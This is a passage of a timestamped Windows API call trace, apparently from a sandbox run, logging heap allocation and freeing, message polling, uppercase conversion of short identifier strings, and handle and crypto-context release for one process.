wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0244.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0244.339] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.339] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0244.340] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.340] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.340] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0244.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0244.340] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.340] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0244.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.340] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0244.340] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.340] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0244.340] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.341] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0244.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.341] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0244.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.341] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.341] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.341] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.341] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.342] CryptReleaseContext (hProv=0xad2720, dwFlags=0x0) returned 1 [0244.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0244.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.344] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.345] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0244.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.346] FreeLibrary (hLibModule=0x74d40000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0244.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0244.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0244.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0244.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0244.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0244.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.348] CloseHandle (hObject=0x2a0) returned 1 [0244.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0244.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0244.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0244.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0244.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.351] CloseHandle (hObject=0x2c8) returned 1 [0244.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0244.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.411] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0244.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0244.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 